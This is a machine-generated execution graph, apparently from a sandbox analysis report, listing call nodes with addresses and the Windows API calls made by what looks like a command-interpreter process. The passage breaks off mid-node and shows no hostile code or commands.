                                                      execution_graph 16798 7ff7e1dd9900 16803 7ff7e1dbff70 16798->16803 16801 7ff7e1dbff70 2 API calls 16802 7ff7e1dd991b 16801->16802 16804 7ff7e1dbff7c 16803->16804 16805 7ff7e1dbffdb 16803->16805 16804->16805 16806 7ff7e1dbffb5 GetProcessHeap RtlFreeHeap 16804->16806 16805->16801 16806->16805 17929 7ff7e1db6be0 17930 7ff7e1dbcd90 166 API calls 17929->17930 17931 7ff7e1db6c04 17930->17931 17932 7ff7e1db6c13 _pipe 17931->17932 17933 7ff7e1dd41a2 17931->17933 17934 7ff7e1db6e26 17932->17934 17938 7ff7e1db6c32 17932->17938 17936 7ff7e1db3278 166 API calls 17933->17936 17935 7ff7e1db3278 166 API calls 17934->17935 17935->17933 17937 7ff7e1dd41bc 17936->17937 17939 7ff7e1dde91c 198 API calls 17937->17939 17940 7ff7e1db6df1 17938->17940 17980 7ff7e1dbaffc _dup 17938->17980 17941 7ff7e1dd41c1 17939->17941 17944 7ff7e1db3278 166 API calls 17941->17944 17943 7ff7e1db6c7d 17943->17933 17946 7ff7e1dbb038 _dup2 17943->17946 17945 7ff7e1dd41d2 17944->17945 17947 7ff7e1dde91c 198 API calls 17945->17947 17948 7ff7e1db6c93 17946->17948 17949 7ff7e1dd41d7 17947->17949 17948->17949 17951 7ff7e1dbd208 _close 17948->17951 17950 7ff7e1db3278 166 API calls 17949->17950 17952 7ff7e1dd41e4 17950->17952 17953 7ff7e1db6ca4 17951->17953 17954 7ff7e1dde91c 198 API calls 17952->17954 17982 7ff7e1dbbe00 17953->17982 17955 7ff7e1dd41e9 17954->17955 17958 7ff7e1db6ccf _get_osfhandle DuplicateHandle 17959 7ff7e1db6d07 17958->17959 17960 7ff7e1dbb038 _dup2 17959->17960 17961 7ff7e1db6d11 17960->17961 17961->17949 17962 7ff7e1dbd208 _close 17961->17962 17963 7ff7e1db6d22 17962->17963 17964 7ff7e1db6e21 17963->17964 17966 7ff7e1dbaffc _dup 17963->17966 17965 7ff7e1dde91c 198 API calls 17964->17965 17965->17934 17967 7ff7e1db6d57 17966->17967 17967->17941 17968 7ff7e1dbb038 _dup2 17967->17968 17969 7ff7e1db6d6c 17968->17969 17969->17949 17970 7ff7e1dbd208 _close 17969->17970 17971 7ff7e1db6d7c 17970->17971 17972 7ff7e1dbbe00 647 API calls 17971->17972 17973 7ff7e1db6d9c 17972->17973 17974 7ff7e1dbb038 _dup2 17973->17974 17975 7ff7e1db6da8 17974->17975 17975->17949 17976 7ff7e1dbd208 _close 17975->17976 17977 7ff7e1db6db9 17976->17977 17977->17964 17978 7ff7e1db6dc1 17977->17978 17978->17940 18016 7ff7e1db6e60 17978->18016 17981 7ff7e1dbb018 17980->17981 17981->17943 17983 7ff7e1dbbe1b 17982->17983 17994 7ff7e1db6cc4 17982->17994 17984 7ff7e1dbbe47 memset 17983->17984 17989 7ff7e1dbbe67 17983->17989 17983->17994 18093 7ff7e1dbbff0 17984->18093 17986 7ff7e1dbbe92 17999 7ff7e1dbbea1 17986->17999 18020 7ff7e1dbc620 GetConsoleTitleW 17986->18020 17987 7ff7e1dbbe73 17987->17986 17992 7ff7e1dbbf0c 17987->17992 17988 7ff7e1dbbf29 17991 7ff7e1dbcd90 166 API calls 17988->17991 17989->17987 17989->17988 17990 7ff7e1dbbeaf 17989->17990 17990->17994 17997 7ff7e1dbbff0 185 API calls 17990->17997 17995 7ff7e1dbbf33 17991->17995 18131 7ff7e1dbb0d8 memset 17992->18131 17994->17958 17994->17959 17995->17990 18000 7ff7e1dbbf70 17995->18000 18191 7ff7e1db88a8 17995->18191 17997->17994 17999->17990 18005 7ff7e1dbaf98 2 API calls 17999->18005 18010 7ff7e1dbbf75 18000->18010 18248 7ff7e1db71ec 18000->18248 18001 7ff7e1dbbf1e 18001->17990 18005->17990 18006 7ff7e1dbbfa9 18006->17990 18008 7ff7e1dbcd90 166 API calls 18006->18008 18009 7ff7e1dbbfbb 18008->18009 18009->17990 18011 7ff7e1dc081c 166 API calls 18009->18011 18012 7ff7e1dbb0d8 194 API calls 18010->18012 18011->18010 18013 7ff7e1dbbf7f 18012->18013 18013->17990 18064 7ff7e1dc5ad8 18013->18064 18018 7ff7e1db6e6d 18016->18018 18017 7ff7e1db6eb9 18017->17940 18018->18017 18019 7ff7e1dc5cb4 7 API calls 18018->18019 18019->18018 18021 7ff7e1dbca2f 18020->18021 18023 7ff7e1dbc675 18020->18023 18022 7ff7e1dcc5fc GetLastError 18021->18022 18025 7ff7e1db3278 166 API calls 18021->18025 18026 7ff7e1dc855c ??_V@YAXPEAX 18021->18026 18022->18021 18024 7ff7e1dbca40 17 API calls 18023->18024 18036 7ff7e1dbc69b 18024->18036 18025->18021 18026->18021 18027 7ff7e1dc291c 8 API calls 18030 7ff7e1dbc762 18027->18030 18028 7ff7e1dbc9b5 18032 7ff7e1dc855c ??_V@YAXPEAX 18028->18032 18029 7ff7e1db89c0 23 API calls 18035 7ff7e1dbc964 18029->18035 18030->18021 18030->18027 18031 7ff7e1dc855c ??_V@YAXPEAX 18030->18031 18030->18035 18050 7ff7e1dbc78a wcschr 18030->18050 18051 7ff7e1dbc83d 18030->18051 18053 7ff7e1dbca25 18030->18053 18056 7ff7e1dcc684 18030->18056 18058 7ff7e1dbca2a 18030->18058 18031->18030 18034 7ff7e1dbc855 18032->18034 18033 7ff7e1dbc978 towupper 18033->18035 18039 7ff7e1dbc872 18034->18039 18043 7ff7e1dcc6b8 SetConsoleTitleW 18034->18043 18035->18022 18035->18028 18035->18029 18035->18030 18035->18033 18035->18035 18040 7ff7e1ddec14 173 API calls 18035->18040 18060 7ff7e1dbca16 GetLastError 18035->18060 18036->18021 18036->18028 18036->18030 18037 7ff7e1dbd3f0 223 API calls 18036->18037 18038 7ff7e1dbc741 18037->18038 18041 7ff7e1dbc74d 18038->18041 18045 7ff7e1dbc8b5 wcsncmp 18038->18045 18042 7ff7e1dc855c ??_V@YAXPEAX 18039->18042 18040->18030 18041->18030 18254 7ff7e1dbbd38 18041->18254 18044 7ff7e1dbc87c 18042->18044 18043->18039 18047 7ff7e1dc8f80 7 API calls 18044->18047 18045->18030 18045->18041 18048 7ff7e1dbc88e 18047->18048 18048->17999 18050->18030 18262 7ff7e1dbcb40 18051->18262 18055 7ff7e1db3278 166 API calls 18053->18055 18055->18021 18057 7ff7e1db3278 166 API calls 18056->18057 18057->18021 18059 7ff7e1dc9158 7 API calls 18058->18059 18059->18021 18062 7ff7e1db3278 166 API calls 18060->18062 18063 7ff7e1dcc675 18062->18063 18063->18021 18065 7ff7e1dbcd90 166 API calls 18064->18065 18066 7ff7e1dc5b12 18065->18066 18067 7ff7e1dbcb40 166 API calls 18066->18067 18092 7ff7e1dc5b8b 18066->18092 18069 7ff7e1dc5b26 18067->18069 18068 7ff7e1dc8f80 7 API calls 18070 7ff7e1dbbf99 18068->18070 18071 7ff7e1dc0a6c 273 API calls 18069->18071 18069->18092 18070->17999 18072 7ff7e1dc5b43 18071->18072 18073 7ff7e1dc5bb8 18072->18073 18074 7ff7e1dc5b48 GetConsoleTitleW 18072->18074 18076 7ff7e1dc5bf4 18073->18076 18077 7ff7e1dc5bbd GetConsoleTitleW 18073->18077 18075 7ff7e1dbcad4 172 API calls 18074->18075 18078 7ff7e1dc5b66 18075->18078 18079 7ff7e1dcf452 18076->18079 18080 7ff7e1dc5bfd 18076->18080 18081 7ff7e1dbcad4 172 API calls 18077->18081 18283 7ff7e1dc4224 InitializeProcThreadAttributeList 18078->18283 18083 7ff7e1dc3c24 166 API calls 18079->18083 18086 7ff7e1dcf462 18080->18086 18087 7ff7e1dc5c1b 18080->18087 18080->18092 18084 7ff7e1dc5bdb 18081->18084 18083->18092 18343 7ff7e1db96e8 18084->18343 18090 7ff7e1db3278 166 API calls 18086->18090 18089 7ff7e1db3278 166 API calls 18087->18089 18088 7ff7e1dc5b7f 18091 7ff7e1dc5c3c SetConsoleTitleW 18088->18091 18089->18092 18090->18092 18091->18092 18092->18068 18094 7ff7e1dbc01c 18093->18094 18126 7ff7e1dbc0c4 18093->18126 18095 7ff7e1dbc022 18094->18095 18096 7ff7e1dbc086 18094->18096 18097 7ff7e1dbc030 18095->18097 18098 7ff7e1dbc113 18095->18098 18099 7ff7e1dbc144 18096->18099 18113 7ff7e1dbc094 18096->18113 18100 7ff7e1dbc039 wcschr 18097->18100 18105 7ff7e1dbc053 18097->18105 18098->18105 18110 7ff7e1dbff70 2 API calls 18098->18110 18101 7ff7e1dbc151 18099->18101 18130 7ff7e1dbc1c8 18099->18130 18102 7ff7e1dbc301 18100->18102 18100->18105 18994 7ff7e1dbc460 18101->18994 18109 7ff7e1dbcd90 166 API calls 18102->18109 18103 7ff7e1dbc0c6 18108 7ff7e1dbc0cf wcschr 18103->18108 18117 7ff7e1dbc073 18103->18117 18104 7ff7e1dbc058 18116 7ff7e1dbff70 2 API calls 18104->18116 18104->18117 18105->18103 18105->18104 18121 7ff7e1dbc211 18105->18121 18107 7ff7e1dbc460 183 API calls 18107->18113 18114 7ff7e1dbc1be 18108->18114 18108->18117 18111 7ff7e1dbc30b 18109->18111 18110->18105 18111->18121 18123 7ff7e1dbc3d4 18111->18123 18124 7ff7e1dbd840 178 API calls 18111->18124 18111->18126 18113->18107 18113->18126 18115 7ff7e1dbcd90 166 API calls 18114->18115 18115->18130 18116->18117 18119 7ff7e1dbc460 183 API calls 18117->18119 18117->18126 18118 7ff7e1dbc460 183 API calls 18118->18126 18119->18117 18120 7ff7e1dbc285 18120->18121 18127 7ff7e1dbb6b0 170 API calls 18120->18127 18125 7ff7e1dbff70 2 API calls 18121->18125 18122 7ff7e1dbb6b0 170 API calls 18122->18105 18123->18117 18123->18121 18123->18122 18124->18111 18125->18126 18126->17989 18129 7ff7e1dbc2ac 18127->18129 18128 7ff7e1dbd840 178 API calls 18128->18130 18129->18117 18129->18121 18130->18120 18130->18121 18130->18126 18130->18128 18132 7ff7e1dbca40 17 API calls 18131->18132 18140 7ff7e1dbb162 18132->18140 18133 7ff7e1dbb303 18136 7ff7e1dc8f80 7 API calls 18133->18136 18134 7ff7e1dbb2f7 ??_V@YAXPEAX 18134->18133 18135 7ff7e1dbb1d9 18139 7ff7e1dbcd90 166 API calls 18135->18139 18141 7ff7e1dbb1ed 18135->18141 18138 7ff7e1dbb315 18136->18138 18137 7ff7e1dc1ea0 8 API calls 18137->18140 18138->17986 18138->18001 18139->18141 18140->18135 18140->18137 18161 7ff7e1dbb2e1 18140->18161 18143 7ff7e1dbb228 _get_osfhandle 18141->18143 18144 7ff7e1dcbfef _get_osfhandle SetFilePointer 18141->18144 18145 7ff7e1dbaffc _dup 18141->18145 18150 7ff7e1dcc1c3 18141->18150 18151 7ff7e1dc01b8 6 API calls 18141->18151 18152 7ff7e1dbd208 _close 18141->18152 18156 7ff7e1dcc060 18141->18156 18158 7ff7e1dbb038 _dup2 18141->18158 18159 7ff7e1dcc246 18141->18159 18160 7ff7e1dcc1a5 18141->18160 18141->18161 18163 7ff7e1dc26e0 19 API calls 18141->18163 18166 7ff7e1dbb356 18141->18166 19008 7ff7e1ddf318 _get_osfhandle GetFileType 18141->19008 18143->18141 18146 7ff7e1dbb23f _get_osfhandle 18143->18146 18144->18141 18147 7ff7e1dcc01d 18144->18147 18145->18141 18146->18141 18148 7ff7e1dc33f0 _vsnwprintf 18147->18148 18149 7ff7e1dcc038 18148->18149 18154 7ff7e1db3278 166 API calls 18149->18154 18153 7ff7e1dc33f0 _vsnwprintf 18150->18153 18151->18141 18152->18141 18153->18149 18155 7ff7e1dcc1f9 18154->18155 18157 7ff7e1dbaf98 2 API calls 18155->18157 18156->18159 18164 7ff7e1dc09f4 2 API calls 18156->18164 18157->18161 18158->18141 18165 7ff7e1dbaf98 2 API calls 18159->18165 18162 7ff7e1dbb038 _dup2 18160->18162 18161->18133 18161->18134 18167 7ff7e1dcc1b7 18162->18167 18163->18141 18168 7ff7e1dcc084 18164->18168 18169 7ff7e1dcc24b 18165->18169 18175 7ff7e1dbaf98 2 API calls 18166->18175 18171 7ff7e1dcc1be 18167->18171 18172 7ff7e1dcc207 18167->18172 18173 7ff7e1dbb900 166 API calls 18168->18173 18170 7ff7e1ddf1d8 166 API calls 18169->18170 18170->18161 18176 7ff7e1dbd208 _close 18171->18176 18174 7ff7e1dbd208 _close 18172->18174 18177 7ff7e1dcc08c 18173->18177 18174->18166 18178 7ff7e1dcc211 18175->18178 18176->18150 18179 7ff7e1dcc094 wcsrchr 18177->18179 18190 7ff7e1dcc0ad 18177->18190 18180 7ff7e1dc33f0 _vsnwprintf 18178->18180 18179->18190 18181 7ff7e1dcc22c 18180->18181 18182 7ff7e1db3278 166 API calls 18181->18182 18182->18161 18183 7ff7e1dcc106 18185 7ff7e1dbff70 2 API calls 18183->18185 18184 7ff7e1dcc0e0 _wcsnicmp 18184->18190 18186 7ff7e1dcc13b 18185->18186 18186->18159 18187 7ff7e1dcc146 SearchPathW 18186->18187 18187->18159 18188 7ff7e1dcc188 18187->18188 18189 7ff7e1dc26e0 19 API calls 18188->18189 18189->18160 18190->18183 18190->18184 18192 7ff7e1db88fc 18191->18192 18194 7ff7e1db88cf 18191->18194 18192->18000 18195 7ff7e1dc0a6c 18192->18195 18193 7ff7e1db88df _wcsicmp 18193->18194 18194->18192 18194->18193 18196 7ff7e1dc1ea0 8 API calls 18195->18196 18197 7ff7e1dc0ab9 18196->18197 18198 7ff7e1dc0b12 memset 18197->18198 18199 7ff7e1dcd927 18197->18199 18200 7ff7e1dc0aee _wcsnicmp 18197->18200 18203 7ff7e1dc128f ??_V@YAXPEAX 18197->18203 18201 7ff7e1dbca40 17 API calls 18198->18201 18202 7ff7e1dc081c 166 API calls 18199->18202 18200->18198 18200->18199 18204 7ff7e1dc0b5a 18201->18204 18205 7ff7e1dcd933 18202->18205 18206 7ff7e1dbb364 17 API calls 18204->18206 18212 7ff7e1dcd94e 18204->18212 18205->18198 18205->18203 18207 7ff7e1dc0b6f 18206->18207 18207->18203 18209 7ff7e1dc0b8c wcschr 18207->18209 18207->18212 18214 7ff7e1dc0c0f wcsrchr 18207->18214 18216 7ff7e1dc081c 166 API calls 18207->18216 18222 7ff7e1dbcd90 166 API calls 18207->18222 18223 7ff7e1dc3060 171 API calls 18207->18223 18224 7ff7e1dbd3f0 223 API calls 18207->18224 18225 7ff7e1dbaf74 170 API calls 18207->18225 18226 7ff7e1dc0d71 wcsrchr 18207->18226 18228 7ff7e1dc1ea0 8 API calls 18207->18228 18230 7ff7e1dc0fb1 wcsrchr 18207->18230 18231 7ff7e1dc0fd0 wcschr 18207->18231 18234 7ff7e1dc10fd wcsrchr 18207->18234 18241 7ff7e1dc2eb4 22 API calls 18207->18241 18244 7ff7e1dc1087 _wcsicmp 18207->18244 18246 7ff7e1dcda74 18207->18246 19009 7ff7e1dc3bac 18207->19009 19013 7ff7e1dc291c GetDriveTypeW 18207->19013 19016 7ff7e1dc2efc 18207->19016 18208 7ff7e1dcd96b ??_V@YAXPEAX 18208->18212 18209->18207 18212->18208 18213 7ff7e1dcd99a wcschr 18212->18213 18215 7ff7e1dcd9ca GetFileAttributesW 18212->18215 18218 7ff7e1dcda64 18212->18218 18219 7ff7e1dcd9fd ??_V@YAXPEAX 18212->18219 18213->18212 18214->18207 18214->18212 18215->18212 18215->18218 18216->18207 18217 7ff7e1dcda90 GetFileAttributesW 18217->18212 18220 7ff7e1dcdaa8 GetLastError 18217->18220 18219->18212 18220->18218 18221 7ff7e1dcdab9 18220->18221 18221->18212 18222->18207 18223->18207 18224->18207 18225->18207 18226->18207 18227 7ff7e1dc0d97 NeedCurrentDirectoryForExePathW 18226->18227 18227->18207 18227->18212 18228->18207 18230->18207 18230->18231 18231->18218 18232 7ff7e1dc0fed wcschr 18231->18232 18232->18207 18232->18218 18234->18207 18235 7ff7e1dc111a _wcsicmp 18234->18235 18236 7ff7e1dc1138 _wcsicmp 18235->18236 18237 7ff7e1dc123d 18235->18237 18236->18237 18238 7ff7e1dc10c5 18236->18238 18239 7ff7e1dc1175 18237->18239 18242 7ff7e1dc1250 ??_V@YAXPEAX 18237->18242 18238->18239 18240 7ff7e1dc1169 ??_V@YAXPEAX 18238->18240 18243 7ff7e1dc8f80 7 API calls 18239->18243 18240->18239 18241->18207 18242->18239 18245 7ff7e1dc1189 18243->18245 18244->18246 18247 7ff7e1dc10a7 _wcsicmp 18244->18247 18245->18000 18246->18217 18246->18218 18247->18238 18247->18246 18249 7ff7e1db7211 _setjmp 18248->18249 18253 7ff7e1db7279 18248->18253 18251 7ff7e1db7265 18249->18251 18249->18253 19030 7ff7e1db72b0 18251->19030 18253->18006 18255 7ff7e1dbbd6f 18254->18255 18259 7ff7e1dbbda2 18254->18259 18255->18259 18278 7ff7e1ddeaf0 18255->18278 18257 7ff7e1dcc4ab 18258 7ff7e1db3240 166 API calls 18257->18258 18257->18259 18260 7ff7e1dcc4bc 18258->18260 18259->18030 18260->18259 18261 7ff7e1db3240 166 API calls 18260->18261 18261->18260 18263 7ff7e1dbcb63 18262->18263 18264 7ff7e1dbcd90 166 API calls 18263->18264 18265 7ff7e1dbc848 18264->18265 18265->18034 18266 7ff7e1dbcad4 18265->18266 18267 7ff7e1dbcb05 18266->18267 18268 7ff7e1dbcad9 18266->18268 18267->18034 18268->18267 18269 7ff7e1dbcd90 166 API calls 18268->18269 18270 7ff7e1dcc722 18269->18270 18270->18267 18271 7ff7e1dcc72e GetConsoleTitleW 18270->18271 18271->18267 18272 7ff7e1dcc74a 18271->18272 18273 7ff7e1dbb6b0 170 API calls 18272->18273 18277 7ff7e1dcc778 18273->18277 18274 7ff7e1dcc7ec 18275 7ff7e1dbff70 2 API calls 18274->18275 18275->18267 18276 7ff7e1dcc7dd SetConsoleTitleW 18276->18274 18277->18274 18277->18276 18279 7ff7e1db3410 18 API calls 18278->18279 18280 7ff7e1ddeb1e 18279->18280 18281 7ff7e1dbb998 207 API calls 18280->18281 18282 7ff7e1ddeb2e 18281->18282 18282->18257 18284 7ff7e1dcecd4 GetLastError 18283->18284 18285 7ff7e1dc42ab UpdateProcThreadAttribute 18283->18285 18286 7ff7e1dcecee 18284->18286 18287 7ff7e1dcecf0 GetLastError 18285->18287 18288 7ff7e1dc42eb memset memset GetStartupInfoW 18285->18288 18392 7ff7e1dd9eec 18287->18392 18367 7ff7e1dc3a90 18288->18367 18293 7ff7e1dbb900 166 API calls 18294 7ff7e1dc43bb 18293->18294 18295 7ff7e1dc4638 _local_unwind 18294->18295 18296 7ff7e1dc43cc 18294->18296 18295->18296 18297 7ff7e1dc4415 18296->18297 18298 7ff7e1dc43de wcsrchr 18296->18298 18379 7ff7e1dc5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18297->18379 18298->18297 18299 7ff7e1dc43f7 lstrcmpW 18298->18299 18299->18297 18301 7ff7e1dc4668 18299->18301 18380 7ff7e1dd9044 18301->18380 18302 7ff7e1dc441a 18304 7ff7e1dc442a CreateProcessW 18302->18304 18306 7ff7e1dc4596 CreateProcessAsUserW 18302->18306 18305 7ff7e1dc448b 18304->18305 18307 7ff7e1dc4672 GetLastError 18305->18307 18308 7ff7e1dc4495 CloseHandle 18305->18308 18306->18305 18318 7ff7e1dc468d 18307->18318 18309 7ff7e1dc498c 8 API calls 18308->18309 18310 7ff7e1dc44c5 18309->18310 18313 7ff7e1dc44cd 18310->18313 18310->18318 18311 7ff7e1dc47a3 18311->18088 18312 7ff7e1dc44f8 18312->18311 18314 7ff7e1dc4612 18312->18314 18316 7ff7e1dc5cb4 7 API calls 18312->18316 18313->18311 18313->18312 18332 7ff7e1dda250 33 API calls 18313->18332 18317 7ff7e1dc461c 18314->18317 18320 7ff7e1dc47e1 CloseHandle 18314->18320 18315 7ff7e1dbcd90 166 API calls 18319 7ff7e1dc4724 18315->18319 18321 7ff7e1dc4517 18316->18321 18323 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18317->18323 18318->18313 18318->18315 18322 7ff7e1dc472c _local_unwind 18319->18322 18329 7ff7e1dc473d 18319->18329 18320->18317 18324 7ff7e1dc33f0 _vsnwprintf 18321->18324 18322->18329 18325 7ff7e1dc47fa DeleteProcThreadAttributeList 18323->18325 18326 7ff7e1dc4544 18324->18326 18327 7ff7e1dc8f80 7 API calls 18325->18327 18328 7ff7e1dc498c 8 API calls 18326->18328 18330 7ff7e1dc4820 18327->18330 18331 7ff7e1dc4558 18328->18331 18333 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18329->18333 18330->18088 18334 7ff7e1dc4564 18331->18334 18335 7ff7e1dc47ae 18331->18335 18332->18312 18336 7ff7e1dc475b _local_unwind 18333->18336 18337 7ff7e1dc498c 8 API calls 18334->18337 18338 7ff7e1dc33f0 _vsnwprintf 18335->18338 18336->18313 18339 7ff7e1dc4577 18337->18339 18338->18314 18339->18317 18340 7ff7e1dc457f 18339->18340 18341 7ff7e1dda920 210 API calls 18340->18341 18342 7ff7e1dc4584 18341->18342 18342->18317 18347 7ff7e1db9737 18343->18347 18345 7ff7e1dbcd90 166 API calls 18345->18347 18346 7ff7e1db977d memset 18348 7ff7e1dbca40 17 API calls 18346->18348 18347->18345 18347->18346 18349 7ff7e1dcb7b3 18347->18349 18350 7ff7e1dcb76e 18347->18350 18352 7ff7e1dbb364 17 API calls 18347->18352 18359 7ff7e1dcb79a 18347->18359 18362 7ff7e1db986d 18347->18362 18399 7ff7e1dc1fac memset 18347->18399 18426 7ff7e1dbce10 18347->18426 18476 7ff7e1db96b4 18347->18476 18481 7ff7e1dc5920 18347->18481 18348->18347 18351 7ff7e1db3278 166 API calls 18350->18351 18355 7ff7e1dcb787 18351->18355 18352->18347 18353 7ff7e1dc855c ??_V@YAXPEAX 18353->18349 18354 7ff7e1dcb795 18495 7ff7e1dd7694 18354->18495 18355->18354 18487 7ff7e1dde944 18355->18487 18359->18353 18363 7ff7e1db9880 ??_V@YAXPEAX 18362->18363 18364 7ff7e1db988c 18362->18364 18363->18364 18365 7ff7e1dc8f80 7 API calls 18364->18365 18366 7ff7e1db989d 18365->18366 18366->18088 18368 7ff7e1dc3aa4 18367->18368 18377 7ff7e1dc3b73 18367->18377 18368->18377 18394 7ff7e1dc09f4 18368->18394 18371 7ff7e1dbb900 166 API calls 18372 7ff7e1dc3ad0 18371->18372 18373 7ff7e1dc3ad8 wcsrchr 18372->18373 18376 7ff7e1dc3af4 18372->18376 18373->18376 18374 7ff7e1dc3b66 18375 7ff7e1dbff70 2 API calls 18374->18375 18375->18377 18376->18374 18378 7ff7e1dc3b2d _wcsnicmp 18376->18378 18377->18293 18378->18376 18381 7ff7e1dc3a90 170 API calls 18380->18381 18382 7ff7e1dd9064 18381->18382 18383 7ff7e1dd906e 18382->18383 18385 7ff7e1dd9083 18382->18385 18384 7ff7e1dc498c 8 API calls 18383->18384 18386 7ff7e1dd9081 18384->18386 18385->18385 18387 7ff7e1dbcd90 166 API calls 18385->18387 18386->18297 18388 7ff7e1dd909b 18387->18388 18388->18386 18389 7ff7e1dc498c 8 API calls 18388->18389 18390 7ff7e1dd90ec 18389->18390 18391 7ff7e1dbff70 2 API calls 18390->18391 18391->18386 18393 7ff7e1dced0a DeleteProcThreadAttributeList 18392->18393 18393->18286 18395 7ff7e1dc0a3c 18394->18395 18396 7ff7e1dc0a0b iswspace 18394->18396 18395->18371 18397 7ff7e1dc0a21 wcschr 18396->18397 18398 7ff7e1dc0a50 18396->18398 18397->18395 18397->18398 18398->18395 18398->18396 18398->18397 18401 7ff7e1dc203b 18399->18401 18400 7ff7e1dc20b0 18403 7ff7e1dc3060 171 API calls 18400->18403 18405 7ff7e1dc211c 18400->18405 18401->18400 18402 7ff7e1dc2094 18401->18402 18404 7ff7e1dc20a6 18402->18404 18406 7ff7e1db3278 166 API calls 18402->18406 18403->18405 18408 7ff7e1dc8f80 7 API calls 18404->18408 18405->18404 18501 7ff7e1dc2e44 18405->18501 18406->18404 18409 7ff7e1dc2325 18408->18409 18409->18347 18410 7ff7e1dc2148 18410->18404 18506 7ff7e1dc2d70 18410->18506 18413 7ff7e1dbb900 166 API calls 18415 7ff7e1dc21d0 18413->18415 18414 7ff7e1dce04a ??_V@YAXPEAX 18414->18404 18415->18414 18416 7ff7e1dc22a4 ??_V@YAXPEAX 18415->18416 18417 7ff7e1dc221c wcsspn 18415->18417 18416->18404 18419 7ff7e1dbb900 166 API calls 18417->18419 18420 7ff7e1dc223b 18419->18420 18420->18414 18424 7ff7e1dc2252 18420->18424 18421 7ff7e1dc228f 18422 7ff7e1dbd3f0 223 API calls 18421->18422 18422->18416 18423 7ff7e1dce06d wcschr 18423->18424 18424->18421 18424->18423 18425 7ff7e1dce090 towupper 18424->18425 18425->18421 18425->18424 18464 7ff7e1dbd0f8 18426->18464 18475 7ff7e1dbce5b 18426->18475 18427 7ff7e1dc8f80 7 API calls 18430 7ff7e1dbd10a 18427->18430 18428 7ff7e1dcc860 18429 7ff7e1dcc97c 18428->18429 18432 7ff7e1ddee88 390 API calls 18428->18432 18431 7ff7e1dde9b4 197 API calls 18429->18431 18430->18347 18434 7ff7e1dcc981 longjmp 18431->18434 18435 7ff7e1dcc879 18432->18435 18436 7ff7e1dcc99a 18434->18436 18437 7ff7e1dcc882 EnterCriticalSection LeaveCriticalSection 18435->18437 18438 7ff7e1dcc95c 18435->18438 18441 7ff7e1dcc9b3 ??_V@YAXPEAX 18436->18441 18436->18464 18443 7ff7e1dbd0e3 18437->18443 18438->18429 18444 7ff7e1db96b4 186 API calls 18438->18444 18439 7ff7e1dbcd90 166 API calls 18439->18475 18441->18464 18442 7ff7e1dbceaa _tell 18445 7ff7e1dbd208 _close 18442->18445 18443->18347 18444->18438 18445->18475 18446 7ff7e1dcc9d5 18626 7ff7e1ddd610 18446->18626 18448 7ff7e1dbb900 166 API calls 18448->18475 18450 7ff7e1dcca07 18451 7ff7e1dde91c 198 API calls 18450->18451 18456 7ff7e1dcca0c 18451->18456 18452 7ff7e1ddbfec 176 API calls 18453 7ff7e1dcc9f1 18452->18453 18454 7ff7e1db3240 166 API calls 18453->18454 18454->18450 18455 7ff7e1dbcf33 memset 18455->18475 18456->18347 18457 7ff7e1dbca40 17 API calls 18457->18475 18458 7ff7e1dbd184 wcschr 18458->18475 18460 7ff7e1dcc9c9 18462 7ff7e1dc855c ??_V@YAXPEAX 18460->18462 18461 7ff7e1dbd1a7 wcschr 18461->18475 18462->18464 18464->18427 18465 7ff7e1dc0a6c 273 API calls 18465->18475 18466 7ff7e1dbbe00 635 API calls 18466->18475 18467 7ff7e1dc3448 166 API calls 18467->18475 18468 7ff7e1dbcfab _wcsicmp 18468->18475 18469 7ff7e1dc0580 12 API calls 18470 7ff7e1dbd003 GetConsoleOutputCP GetCPInfo 18469->18470 18471 7ff7e1dc04f4 3 API calls 18470->18471 18471->18475 18473 7ff7e1dc1fac 238 API calls 18473->18475 18474 7ff7e1dbd044 ??_V@YAXPEAX 18474->18475 18475->18428 18475->18436 18475->18439 18475->18443 18475->18446 18475->18448 18475->18455 18475->18457 18475->18458 18475->18460 18475->18461 18475->18464 18475->18465 18475->18466 18475->18467 18475->18468 18475->18469 18475->18473 18475->18474 18516 7ff7e1dc0494 18475->18516 18529 7ff7e1dbdf60 18475->18529 18549 7ff7e1ddbfec 18475->18549 18585 7ff7e1dd778c 18475->18585 18616 7ff7e1ddc738 18475->18616 18477 7ff7e1dcb6e2 RevertToSelf CloseHandle 18476->18477 18478 7ff7e1db96c8 18476->18478 18479 7ff7e1db96ce 18478->18479 18480 7ff7e1db6a48 184 API calls 18478->18480 18479->18347 18480->18478 18482 7ff7e1dc596c 18481->18482 18486 7ff7e1dc5a12 18481->18486 18483 7ff7e1dc598d VirtualQuery 18482->18483 18482->18486 18485 7ff7e1dc59ad 18483->18485 18483->18486 18484 7ff7e1dc59b7 VirtualQuery 18484->18485 18484->18486 18485->18484 18485->18486 18486->18347 18488 7ff7e1dde954 18487->18488 18489 7ff7e1dde990 18487->18489 18490 7ff7e1ddee88 390 API calls 18488->18490 18491 7ff7e1dde9b4 197 API calls 18489->18491 18492 7ff7e1dde964 18490->18492 18493 7ff7e1dde995 longjmp 18491->18493 18492->18489 18494 7ff7e1db96b4 186 API calls 18492->18494 18494->18492 18496 7ff7e1dd76a3 18495->18496 18497 7ff7e1dd76b7 18496->18497 18498 7ff7e1db96b4 186 API calls 18496->18498 18499 7ff7e1dde9b4 197 API calls 18497->18499 18498->18496 18500 7ff7e1dd76bc longjmp 18499->18500 18502 7ff7e1dc9324 malloc 18501->18502 18503 7ff7e1dc2e7b 18502->18503 18504 7ff7e1dc2e83 memset 18503->18504 18505 7ff7e1dc2e90 18503->18505 18504->18505 18505->18410 18507 7ff7e1dc2da3 18506->18507 18508 7ff7e1dc2d89 18506->18508 18507->18508 18509 7ff7e1dc2dbc GetProcessHeap RtlFreeHeap 18507->18509 18511 7ff7e1dc21af 18508->18511 18512 7ff7e1dc2e0c 18508->18512 18509->18507 18509->18508 18511->18413 18513 7ff7e1dc2e11 18512->18513 18514 7ff7e1dc2e32 18512->18514 18513->18514 18515 7ff7e1dce494 VirtualFree 18513->18515 18514->18508 18518 7ff7e1dc04a4 18516->18518 18517 7ff7e1dc26e0 19 API calls 18517->18518 18518->18517 18519 7ff7e1dc04b9 _get_osfhandle SetFilePointer 18518->18519 18520 7ff7e1dcd845 18518->18520 18521 7ff7e1dcd839 18518->18521 18523 7ff7e1db3278 166 API calls 18518->18523 18519->18475 18522 7ff7e1ddf1d8 166 API calls 18520->18522 18524 7ff7e1db3278 166 API calls 18521->18524 18526 7ff7e1dcd837 18522->18526 18525 7ff7e1dcd819 _getch 18523->18525 18524->18526 18525->18518 18527 